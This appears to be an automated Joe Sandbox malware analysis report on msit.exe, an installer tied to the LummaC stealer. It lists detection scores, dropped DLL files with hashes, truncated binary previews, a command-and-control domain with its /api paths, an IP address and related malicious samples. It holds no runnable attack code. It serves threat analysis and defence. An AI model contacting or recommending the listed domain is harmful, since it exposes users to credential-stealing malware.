Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	311 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
msit.exe	5%	ReversingLabs
msit.exe	10%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label
C:\Windows\Installer\MSIA455.tmp	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\MSI96A2.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI9720.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI9760.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI9790.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI97FE.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI982E.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI986D.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI98AD.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI98DD.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIA6C8.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIA708.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\shi95F5.tmp	0%	ReversingLabs
C:\Windows\Installer\MSIA16F.tmp	0%	ReversingLabs
C:\Windows\Installer\MSIA1CE.tmp	0%	ReversingLabs
C:\Windows\Installer\MSIA20D.tmp	0%	ReversingLabs
C:\Windows\Installer\MSIA23D.tmp	0%	ReversingLabs
C:\Windows\Installer\MSIA28C.tmp	0%	ReversingLabs
C:\Windows\Installer\MSIA2BC.tmp	0%	ReversingLabs
C:\Windows\Installer\MSIA2EC.tmp	0%	ReversingLabs
C:\Windows\Installer\MSIA455.tmp	63%	ReversingLabs	Win32.Exploit.LummaC

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://fixxyplanterv.click/api	0%	Avira URL Cloud	safe
https://fixxyplanterv.click/LL	0%	Avira URL Cloud	safe
https://fixxyplanterv.click/3	0%	Avira URL Cloud	safe
https://fixxyplanterv.click/apiK	0%	Avira URL Cloud	safe
https://fixxyplanterv.click/apiDBcD	0%	Avira URL Cloud	safe
fixxyplanterv.click	0%	Avira URL Cloud	safe
https://fixxyplanterv.click/apijBqD	0%	Avira URL Cloud	safe
https://fixxyplanterv.click/	0%	Avira URL Cloud	safe
https://fixxyplanterv.click:443/api	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
fixxyplanterv.click	104.21.6.116	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
dare-curbys.biz	false		high
impend-differ.biz	false		high
covery-mover.biz	false		high
https://fixxyplanterv.click/api	true	Avira URL Cloud: safe	unknown
dwell-exclaim.biz	false		high
zinc-sneark.biz	false		high
fixxyplanterv.click	true	Avira URL Cloud: safe	unknown
formy-spill.biz	false		high
se-blurry.biz	false		high
print-vexer.biz	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://html4/loose.dtd	shi95F5.tmp.0.dr	false		high
https://duckduckgo.com/chrome_newtab	dxdiag.exe, 00000007.00000003.1615267305.00000000051E9000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615331678.00000000051E6000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615421665.00000000051E6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	dxdiag.exe, 00000007.00000003.1615267305.00000000051E9000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615331678.00000000051E6000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615421665.00000000051E6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fixxyplanterv.click/LL	dxdiag.exe, 00000007.00000002.1708428233.0000000002ECC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	dxdiag.exe, 00000007.00000003.1615267305.00000000051E9000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615331678.00000000051E6000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615421665.00000000051E6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fixxyplanterv.click/	dxdiag.exe, 00000007.00000003.1697924723.0000000002F73000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1676263312.0000000002F73000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000002.1708428233.0000000002EFF000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1662361641.0000000002F65000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1697639523.0000000002F72000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000002.1708678569.0000000002F72000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000002.1708428233.0000000002EF1000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1676727815.0000000002F72000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1676142921.0000000002F72000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1681864403.0000000002F72000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1672261175.0000000002F75000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbW	dxdiag.exe, 00000007.00000003.1651908747.000000000523D000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1652145664.0000000005241000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1662253193.0000000005243000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	dxdiag.exe, 00000007.00000003.1615267305.00000000051E9000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615331678.00000000051E6000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615421665.00000000051E6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	dxdiag.exe, 00000007.00000003.1636864869.00000000051C2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	dxdiag.exe, 00000007.00000003.1615267305.00000000051E9000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615331678.00000000051E6000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615421665.00000000051E6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	dxdiag.exe, 00000007.00000003.1636864869.00000000051C2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi	dxdiag.exe, 00000007.00000003.1638111835.0000000005246000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.	dxdiag.exe, 00000007.00000003.1638111835.0000000005246000.00000004.00000800.00020000.00000000.sdmp	false		high
http://.css	shi95F5.tmp.0.dr	false		high
https://www.ecosia.org/newtab/	dxdiag.exe, 00000007.00000003.1615267305.00000000051E9000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615331678.00000000051E6000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615421665.00000000051E6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.microX	dxdiag.exe, 00000007.00000003.1697639523.0000000002F4A000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1681864403.0000000002F3F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	dxdiag.exe, 00000007.00000003.1637786015.00000000054D2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44	dxdiag.exe, 00000007.00000003.1651908747.000000000523D000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1652145664.0000000005241000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1662253193.0000000005243000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fixxyplanterv.click/apiDBcD	dxdiag.exe, 00000007.00000003.1672261175.0000000002F75000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	dxdiag.exe, 00000007.00000003.1615267305.00000000051E9000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615331678.00000000051E6000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615421665.00000000051E6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fixxyplanterv.click:443/api	dxdiag.exe, 00000007.00000003.1681695049.000000000525C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	dxdiag.exe, 00000007.00000003.1651908747.000000000523D000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1652145664.0000000005241000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1662253193.0000000005243000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	dxdiag.exe, 00000007.00000003.1636864869.00000000051C2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	dxdiag.exe, 00000007.00000003.1636864869.00000000051C2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fixxyplanterv.click/apiK	dxdiag.exe, 00000007.00000002.1708428233.0000000002EFF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	dxdiag.exe, 00000007.00000003.1615267305.00000000051E9000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615331678.00000000051E6000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615421665.00000000051E6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	dxdiag.exe, 00000007.00000003.1636864869.00000000051C2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u	dxdiag.exe, 00000007.00000003.1638111835.0000000005246000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fixxyplanterv.click/apijBqD	dxdiag.exe, 00000007.00000003.1676727815.0000000002F72000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta	dxdiag.exe, 00000007.00000003.1651908747.000000000523D000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1652145664.0000000005241000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1662253193.0000000005243000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg	dxdiag.exe, 00000007.00000003.1638111835.0000000005246000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	dxdiag.exe, 00000007.00000003.1637786015.00000000054D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://.jpg	shi95F5.tmp.0.dr	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	dxdiag.exe, 00000007.00000003.1615267305.00000000051E9000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615331678.00000000051E6000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615421665.00000000051E6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fixxyplanterv.click/3	dxdiag.exe, 00000007.00000002.1708678569.0000000002F72000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.6.116	fixxyplanterv.click	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1589843
Start date and time:	2025-01-13 08:33:22 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 14s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	msit.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@12/42@1/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 51% Number of executed functions: 26 Number of non-executed functions: 98
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.253.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target MSIA455.tmp, PID 6188 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:34:39	API Interceptor	8x Sleep call for process: dxdiag.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.6.116	schost.exe	Get hash	malicious	LummaC Stealer	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
fixxyplanterv.click	WSLRT.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.134.197
	msit.msi	Get hash	malicious	LummaC Stealer	Browse	172.67.134.197
	schost.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.6.116

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	tesr.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.90.18
	WSLRT.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.134.197
	msit.msi	Get hash	malicious	LummaC Stealer	Browse	172.67.134.197
	Shipping Docs Waybill No 2009 xxxx 351.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	trow.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://encryption-deme-group.lomiraxen.ru/PdoodjcL/#Mvercauteren.william@deme-group.com	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://link.mail.beehiiv.com/ss/c/u001.dSnm3kaGd0BkNqLYPjeMfxWXllAYaBQ5sAn4OVD0j89GQGPZtwQlLugE_8c0wQMKfkpy5_wJ66BvE1Ognfzf5MlQMAeZ1qYs5mgwUBu3TAc6279Q43ISHz-HkVRC08yeDA4QvKWsqLTI1us9a0eXx18qeAibsZhjMMPvES-iG2zoVABKcwKIVWyx95VTVcFMSh6AEN3OCUfP_rXFvjKRbIPMuhn_dqYr8yUBKJvhhlJR9FhTpZPAULxzMbsYWp8k/4cu/JfECY1HwRl-ipvrNOktVcw/h23/h001.ibQl2N4tDD79TTzErix_sFWEGLTTuM6dTVMrTg3y5Dk	Get hash	malicious	Unknown	Browse	172.67.40.50
	g3.elf	Get hash	malicious	Unknown	Browse	1.1.1.1
	g5.elf	Get hash	malicious	Unknown	Browse	1.1.1.1
	rCHARTERREQUEST.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	tesr.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.6.116
	WSLRT.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.6.116
	msit.msi	Get hash	malicious	LummaC Stealer	Browse	104.21.6.116
	PCB - Lyell Highway Upgrades Queenstown to Strahan - March 2021.XLSM	Get hash	malicious	Unknown	Browse	104.21.6.116
	PCB - Lyell Highway Upgrades Queenstown to Strahan - March 2021.XLSM	Get hash	malicious	Unknown	Browse	104.21.6.116
	L7GNkeVm5e.exe	Get hash	malicious	LummaC	Browse	104.21.6.116
	sE5IdDeTp2.exe	Get hash	malicious	Unknown	Browse	104.21.6.116
	NDWffRLk7z.exe	Get hash	malicious	LummaC	Browse	104.21.6.116
	g3toRYa6JE.exe	Get hash	malicious	LummaC	Browse	104.21.6.116
	lBb4XI4eGD.exe	Get hash	malicious	LummaC	Browse	104.21.6.116

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\MSI96A2.tmp	msit.msi	Get hash	malicious	LummaC Stealer	Browse
	Fact30.NATURGY.LUNESGRLNOPAGOID3012021414252024.MSI.msi	Get hash	malicious	Unknown	Browse
	Fact28.NATURGY.SABADONOPAGOID28122024.MSI.msi	Get hash	malicious	Unknown	Browse
	bmouJCkvam.msi	Get hash	malicious	Unknown	Browse
	FS-SZHAJCVS.msi	Get hash	malicious	Unknown	Browse
	FS-JFDIBGWE.msi	Get hash	malicious	Unknown	Browse
	http://propdfhub.com	Get hash	malicious	Unknown	Browse
	http://res.pdfonestartlive.com	Get hash	malicious	Unknown	Browse
	740d3a.msi	Get hash	malicious	Unknown	Browse
	740d3a.msi	Get hash	malicious	PureCrypter	Browse

Created / dropped Files

C:\Config.Msi\599bb4.rbs

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	1345
Entropy (8bit):	5.697582764423597
Encrypted:	false
SSDEEP:	24:ImgMV8TvbdX6eSGV8TvRPV8TvBdUC+bV8TvjRpUmrw3w8dnwJFP9693DhiSqxt8v:Im36Qee92tmibD3P893D8SMtm
MD5:	15887813E42A4CCF123518039FE6C91C
SHA1:	A257ADAFAF627A8357C99D3BD98EAED23165C7F1
SHA-256:	7EC685336430AEE06C6DAF390AB3FEEE9B5B43F1601724C968C2B39AD20FF9AB
SHA-512:	59E1C06114EF19B2BE0589E961587553EED8973D86447B8006040497DB1C0BD2BBC63B8150FC9970CC217C20FBC8C78FD53E31BCFEC8FDD82D6F747ECBF82E7B
Malicious:	false
Reputation:	low
Preview:	...@IXOS.@.....@S.-Z.@.....@.....@.....@.....@.....@......&.{15630F35-AF86-45E7-B3CF-07A0AC07CAF6}..msit..msit.msi.@.....@.....@.....@........&.{EA6270CA-0126-4785-A430-33ABC9DC920B}.....@.....@.....@.....@.......@.....@.....@.......@......msit......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{86FA086C-1DD0-4082-AC92-FB7682CD7E34}&.{15630F35-AF86-45E7-B3CF-07A0AC07CAF6}.@......&.{F6D3DE48-10AF-4734-A48F-E26E13947E6F}&.{15630F35-AF86-45E7-B3CF-07A0AC07CAF6}.@......&.{39B1484E-9A16-4754-9B1B-81931D13A2A4}&.{15630F35-AF86-45E7-B3CF-07A0AC07CAF6}.@........CreateFolders..Creating folders..Folder: [1]".#.C:\Users\user\AppData\Local\Temp\.@..............0.......L...................$.N......................$.N........X......................................... ... .....$.....................$.N..........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]..#.C:\Users\hu

C:\Users\user\AppData\Local\Temp\MSI96A2.tmp

Download File

Process:	C:\Users\user\Desktop\msit.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1021792
Entropy (8bit):	6.608380087035959
Encrypted:	false
SSDEEP:	24576:ccNkyRsKx6NapcjRh0lhSMXltuGVJ8Wea/xwuC:jNkyRmopy4duG/8Wea/xwuC
MD5:	EC6EBF65FE4F361A73E473F46730E05C
SHA1:	01F946DFBF773F977AF5ADE7C27FFFC7FE311149
SHA-256:	D3614D7BECE53E0D408E31DA7D9B0FF2F7285A7DD544C778847ED0C5DED5D52F
SHA-512:	E4D7AAFA75D07A3071D2739D18B4C2B0A3798F754B339C349DB9A6004D031BF02F3970B030CEC4A5F55B4C19F03794B0CE186A303D936C222E7E6E8726FFFFF7
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: msit.msi, Detection: malicious, Browse Filename: Fact30.NATURGY.LUNESGRLNOPAGOID3012021414252024.MSI.msi, Detection: malicious, Browse Filename: Fact28.NATURGY.SABADONOPAGOID28122024.MSI.msi, Detection: malicious, Browse Filename: bmouJCkvam.msi, Detection: malicious, Browse Filename: FS-SZHAJCVS.msi, Detection: malicious, Browse Filename: FS-JFDIBGWE.msi, Detection: malicious, Browse Filename: , Detection: malicious, Browse Filename: , Detection: malicious, Browse Filename: 740d3a.msi, Detection: malicious, Browse Filename: 740d3a.msi, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L...l..f.........."!...).....`............... ......................................Di....@A............................L...,...@....................Z..`=......h....K..p....................L...... K..@............ ...............................text...Z........................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..h...........................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI9720.tmp

Download File

Process:	C:\Users\user\Desktop\msit.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1021792
Entropy (8bit):	6.608380087035959
Encrypted:	false
SSDEEP:	24576:ccNkyRsKx6NapcjRh0lhSMXltuGVJ8Wea/xwuC:jNkyRmopy4duG/8Wea/xwuC
MD5:	EC6EBF65FE4F361A73E473F46730E05C
SHA1:	01F946DFBF773F977AF5ADE7C27FFFC7FE311149
SHA-256:	D3614D7BECE53E0D408E31DA7D9B0FF2F7285A7DD544C778847ED0C5DED5D52F
SHA-512:	E4D7AAFA75D07A3071D2739D18B4C2B0A3798F754B339C349DB9A6004D031BF02F3970B030CEC4A5F55B4C19F03794B0CE186A303D936C222E7E6E8726FFFFF7
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L...l..f.........."!...).....`............... ......................................Di....@A............................L...,...@....................Z..`=......h....K..p....................L...... K..@............ ...............................text...Z........................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..h...........................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI9760.tmp

Download File

Process:	C:\Users\user\Desktop\msit.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1021792
Entropy (8bit):	6.608380087035959
Encrypted:	false
SSDEEP:	24576:ccNkyRsKx6NapcjRh0lhSMXltuGVJ8Wea/xwuC:jNkyRmopy4duG/8Wea/xwuC
MD5:	EC6EBF65FE4F361A73E473F46730E05C
SHA1:	01F946DFBF773F977AF5ADE7C27FFFC7FE311149
SHA-256:	D3614D7BECE53E0D408E31DA7D9B0FF2F7285A7DD544C778847ED0C5DED5D52F
SHA-512:	E4D7AAFA75D07A3071D2739D18B4C2B0A3798F754B339C349DB9A6004D031BF02F3970B030CEC4A5F55B4C19F03794B0CE186A303D936C222E7E6E8726FFFFF7
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L...l..f.........."!...).....`............... ......................................Di....@A............................L...,...@....................Z..`=......h....K..p....................L...... K..@............ ...............................text...Z........................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..h...........................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI9790.tmp

Download File

Process:	C:\Users\user\Desktop\msit.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1201504
Entropy (8bit):	6.4558508565404535
Encrypted:	false
SSDEEP:	24576:h4FsQxRqkY1ngOktwC2Tec+4VGWSlnH/YrjPWqTIUGFUrHtAkJMsFUh29BKjxm:a2QxNwCsec+4VGWSlnfYvOjUGFUrHtA2
MD5:	03CC8828BB0E0105915B7695B1EC8D88
SHA1:	CBF8EC531EA7E3EE58B51BD642F8BFABDC759EE1
SHA-256:	0E1491AE7344F3A5EC824732648CCDDA19B271D6F01471793BF292840FC83B5E
SHA-512:	593A76166EB6CE2E3537B0D93E216DAEF12E4AB5B181A194B55A90B39A1AF2E0374C4EC3833A000530425319A003CD1A648489640FCCAF108061EBEA1D9CB1E7
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............@G..@G..@G.yCF..@G.yEF..@G.\|CF..@G.\|DF..@G.\|EF..@G.yDF..@G.yAF..@G..AG..@G.}IF..@G.}@F..@G.}.G..@G...G..@G.}BF..@GRich..@G........PE..L...v..f.........."!...).~..........Pq.......................................`............@A........................ ...t...............................`=.......l......p........................... ...@...............L............................text...J}.......~.................. ..`.rdata...;.......<..................@..@.data...............................@....fptable............................@....rsrc...............................@..@.reloc...l.......n..................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI97FE.tmp

Download File

Process:	C:\Users\user\Desktop\msit.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	908128
Entropy (8bit):	6.595002426238024
Encrypted:	false
SSDEEP:	24576:0yuK7uUCx0bzy5UrkfbDUtF4h0lhSMXlpGyFI/Yk6ibf7:0yuHHUtTZGyFI/Yk6ibf7
MD5:	ACCD9092A35E468E8AF934ACCD81E9F6
SHA1:	3751384E5E586481618002469190E3C1F271CE6D
SHA-256:	8339A5EE92E53A155828E58E7700FC17D4F3F8ECB11DAEB52AA1118BA3141ECD
SHA-512:	18E49E56AD2F78DB7F4BFABAB25CC3ECFCC8180BEEA8FF162A5D80BD0A6DB9EB598F9FA1D5167F078A12F382663A2B205D7E512370E4873A60955A174826E8E3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...<..<..<..}?..<..}9...<.x?..<.x8..<..}8..<.x9...<..}:..<..}=..<..=...<..y5...<..y<..<..y...<.....<..y>..<.Rich..<.................PE..L......f.........."!...)............0W..............................................g.....@A.........................................p..h...............`=..............p...............................@.......................@....................text...j........................... ..`.rdata... ......."..................@..@.data...('... ......................@....didat..H....P......................@....fptable.....`......................@....rsrc...h....p......................@..@.reloc..............................@..B................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI982E.tmp

Download File

Process:	C:\Users\user\Desktop\msit.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	908128
Entropy (8bit):	6.595002426238024
Encrypted:	false
